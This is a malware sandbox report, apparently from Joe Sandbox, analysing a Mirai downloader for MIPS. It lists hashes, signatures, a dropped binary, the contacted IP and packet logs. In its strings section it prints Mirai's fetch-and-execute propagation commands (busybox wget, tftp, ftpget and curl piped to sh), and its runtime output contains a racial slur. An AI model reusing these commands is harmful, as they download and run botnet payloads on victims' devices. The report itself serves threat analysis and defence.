Edit tour

Linux Analysis Report
dlr.mpsl.elf

Overview

General Information

Sample name:	dlr.mpsl.elf
Analysis ID:	1579208
MD5:	bcf24c32435f11fa7a75047b9ae32970
SHA1:	7024acc8c2b09ffad2fa57f5dd74a4618ecb8b7d
SHA256:	73db48ac0a40f6cb3d922d1fe43b651b59b5503b2afa667adcf86ab9bd48605a
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai

Score:	56
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Yara detected Mirai

Found strings indicative of a multi-platform dropper

HTTP GET or POST without a user agent

Sample has stripped symbol table

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579208
Start date and time:	2024-12-21 04:41:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	dlr.mpsl.elf
Detection:	MAL
Classification:	mal56.troj.linELF@0/1@0/0

Warnings

Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Runtime Messages

Command:	/tmp/dlr.mpsl.elf
PID:	5430
Exit Code:	5
Exit Code Info:
Killed:	False
Standard Output:	NIGGY RAY
Standard Error:

Process Tree

system is lnxubuntu20

dlr.mpsl.elf (PID: 5430, Parent: 5354, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/dlr.mpsl.elf

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
/tmp/Galaxy	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: dlr.mpsl.elf

ReversingLabs: Detection: 39%

Source: Galaxy.12.dr

String: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname Kamru/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0

Source: global traffic

HTTP traffic detected: GET /mpsl HTTP/1.0Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00 Data Ascii: RAY

Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.44.238.94

Source: global traffic

HTTP traffic detected: GET /mpsl HTTP/1.0Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00 Data Ascii: RAY

Source: Galaxy.12.dr	String found in binary or memory: http:///curl.sh
Source: Galaxy.12.dr	String found in binary or memory: http:///wget.sh

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal56.troj.linELF@0/1@0/0

Source: /tmp/dlr.mpsl.elf (PID: 5430)

File written: /tmp/Galaxy

Jump to dropped file

Source: /tmp/dlr.mpsl.elf (PID: 5430)

Queries kernel information via 'uname':

Jump to behavior

Source: dlr.mpsl.elf, 5430.1.000055e1d80f2000.000055e1d8179000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mipsel
Source: dlr.mpsl.elf, 5430.1.000055e1d80f2000.000055e1d8179000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/mipsel
Source: dlr.mpsl.elf, 5430.1.00007ffcefab0000.00007ffcefad1000.rw-.sdmp	Binary or memory string: 4x86_64/usr/bin/qemu-mipsel/tmp/dlr.mpsl.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/dlr.mpsl.elf
Source: dlr.mpsl.elf, 5430.1.00007ffcefab0000.00007ffcefad1000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsel

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match

File source: /tmp/Galaxy, type: DROPPED

Remote Access Functionality

Yara detected Mirai

Source: Yara match

File source: /tmp/Galaxy, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	Path Interception	Direct Volume Access	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Source	Detection	Scanner	Label	Link
dlr.mpsl.elf	39%	ReversingLabs	Linux.Backdoor.Mirai

Name	Source	Malicious	Antivirus Detection	Reputation
http:///wget.sh	Galaxy.12.dr	false		high
http:///curl.sh	Galaxy.12.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
37.44.238.94	unknown	France		49434	HARMONYHOSTING-ASFR	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37.44.238.94	dlr.arm6.elf	Get hash	malicious	Unknown	Browse	/arm6

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HARMONYHOSTING-ASFR	dlr.arm6.elf	Get hash	malicious	Unknown	Browse	37.44.238.94
	8k1e14tjcx.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	roze.sparc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	37.44.238.73
	roze.armv4.elf	Get hash	malicious	Gafgyt, Mirai	Browse	37.44.238.73
	roze.ppc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	37.44.238.73
	roze.mipsel.elf	Get hash	malicious	Gafgyt, Mirai	Browse	37.44.238.73
	roze.mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	37.44.238.73
	roze.i586.elf	Get hash	malicious	Gafgyt, Mirai	Browse	37.44.238.73
	roze.m68k.elf	Get hash	malicious	Gafgyt, Mirai	Browse	37.44.238.73
	roze.i686.elf	Get hash	malicious	Gafgyt, Mirai	Browse	37.44.238.73

Process:	/tmp/dlr.mpsl.elf
File Type:	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Category:	dropped
Size (bytes):	105780
Entropy (8bit):	5.556320927280351
Encrypted:	false
SSDEEP:	1536:HsWsALpAiROftIQmPU3TYDGptvEjmFGSZGGiX+L9jIGjn7sVLni8VRG:HsWsAdAVftWksj6GSlqesVLnif
MD5:	A34FB1C88834565461D7F071CFA60012
SHA1:	87CBE20971482D8D191D762B747F65A62AEBB74C
SHA-256:	18C750674DA98A57830810E82A63EED6873BB5C390B0CCFCA92863AB2CFD6201
SHA-512:	DCDF9FDA598CA14AA01E97C81E129A424C1957CC6C1DF51260247B8A25A300ADD7CC8A8B99CF7323CE5F9D95B7674DF84FE6FFA155D10E5AF2E1D82E5F4CDA74
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /tmp/Galaxy, Author: Joe Security
Reputation:	low
Preview:	.ELF....................`.@.4...........4. ...(...............@...@...........................E...E.....H\..........Q.td...............................<...'!......'.......................<...'!... .........9'.. ........................<...'!...$........j9'.. ......................... ..'...<...'!......' ........................".......@......................Y....... ...B$.. .............Y....... ...B$..........@....$.............. ....$.......$.". ...............(..'...<...'!......'...........................$..@...$.. ...............................@....$.. ........... . ..'............ ..'....!..............<D..'!...!...(..........'...$$.....'........................P......... ............................<...'!......'0...,...(...$... ...................!...!......0...0H..... ....$......P.......@.....0...,...(...$... ...............8..'.......... ...........P.......@.........L..... ....................... .........! @.8......... ....$........(......... .! ..T......... .........

Static File Info

General

File type:	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	4.719202245810007
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	dlr.mpsl.elf
File size:	2'016 bytes
MD5:	bcf24c32435f11fa7a75047b9ae32970
SHA1:	7024acc8c2b09ffad2fa57f5dd74a4618ecb8b7d
SHA256:	73db48ac0a40f6cb3d922d1fe43b651b59b5503b2afa667adcf86ab9bd48605a
SHA512:	359c35992c10b1b70407785ec367d37e00120fba132c91179178ad2cff772404b4ac4173a088f272de22ceaa65cc5ba73e03eb07559e66698a345c27db95ffc8
SSDEEP:	24:uY23H/ki9mpHRMixZuDa9mCt5BJL4mmlZ9GpeIgO/qM+UTK8mKUlu/OT+wFLCdXa:kff2XnuDW3B6df9HOScTLmPkOTNFSXZ
TLSH:	7641121E6F801F37DD66CC36054B275139CC842BA16A63916334E960BD3E605A7D38A8
File Content Preview:	.ELF......................@.4...........4. ...(...............@...@.@...@...............@...@.D.@.D.T...p...........Q.td...........................................0.,...&..% .....0...0% ...2..%0...".....0.......0.....6..%.C.%0......%.F....<D..'!...\...!(.

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x4004e4
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	1736
Section Header Size:	40
Number of Section Headers:	7
Header String Table Index:	6

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.text	PROGBITS	0x4000a0	0xa0	0x560	0x0	0x6	AX	16
.rodata	PROGBITS	0x400600	0x600	0x40	0x1	0x32	AMS	4
.got	PROGBITS	0x440640	0x640	0x54	0x4	0x10000003	WAp	16
.bss	NOBITS	0x4406a0	0x694	0x10	0x0	0x3	WA	16
.mdebug.abi32	PROGBITS	0x48	0x694	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x694	0x31	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x640	0x640	5.0115	0x5	R E	0x10000	.text .rodata
LOAD	0x640	0x440640	0x440640	0x54	0x70	2.6125	0x6	RW	0x10000	.got .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2024 04:41:57.594425917 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:57.713941097 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:57.714531898 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:57.715764999 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:57.835279942 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:58.984900951 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:58.985050917 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:58.985088110 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:58.985126019 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:58.985176086 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:58.985208988 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:58.985209942 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:58.985209942 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:58.985209942 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:58.985209942 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:58.985244036 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:58.985266924 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:58.985266924 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:58.985316992 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:58.985362053 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:58.985415936 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:58.985423088 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:58.985456944 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:58.985471010 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:58.985500097 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.105078936 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.105125904 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.105324030 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.105324030 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.177175045 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.177196980 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.177450895 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.177489996 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.179574013 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.179641962 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.179676056 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.179732084 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.188123941 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.188261032 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.189321995 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.196413994 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.196556091 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.197837114 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.204797029 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.204921007 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.206218004 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.213253021 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.213325024 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.214569092 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.221637964 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.221785069 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.223303080 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.230038881 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.230170965 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.230294943 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.238470078 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.238555908 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.239094019 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.246906042 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.246964931 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.247807980 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.254515886 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.254581928 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.254806995 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.296961069 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.340367079 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.369425058 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.369534969 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.370306015 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.371803999 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.371891975 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.372122049 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.375767946 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.375828028 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.377392054 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.380825996 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.380842924 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.380966902 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.385816097 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.385865927 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.386615038 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.390480995 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.390568972 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.391802073 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.395246029 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.395360947 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.397058010 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.400085926 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.400103092 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.400587082 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.404711008 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.404781103 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.405724049 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.409499884 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.409516096 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.410698891 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.414226055 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.414475918 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.415685892 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.419023037 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.419097900 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.420643091 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.423741102 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.423866987 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.423969030 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.447158098 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.496920109 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.496943951 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.498496056 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.511257887 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.511337042 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.511523962 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.525202036 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.525230885 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.526088953 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.540122986 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.540215969 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.540765047 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.566729069 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.566776991 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.566930056 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.568864107 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.568983078 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.570233107 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.573271036 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.573395014 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.573523998 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.578042984 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.578061104 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.578438997 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.582081079 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.582195997 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.583348989 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.586431026 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.586642981 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.590821981 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.590903044 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.628336906 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.697951078 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.697985888 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.699485064 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.778052092 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.897568941 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.897842884 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.899471998 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.899632931 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.899643898 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.903337955 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.903419018 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.903680086 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:41:59.907227039 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.907290936 CET	80	41256	37.44.238.94	192.168.2.13
Dec 21, 2024 04:41:59.907716036 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:42:01.218712091 CET	41256	80	192.168.2.13	37.44.238.94
Dec 21, 2024 04:42:01.338323116 CET	80	41256	37.44.238.94	192.168.2.13

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.13	41256	37.44.238.94	80

Timestamp	Bytes transferred	Direction	Data
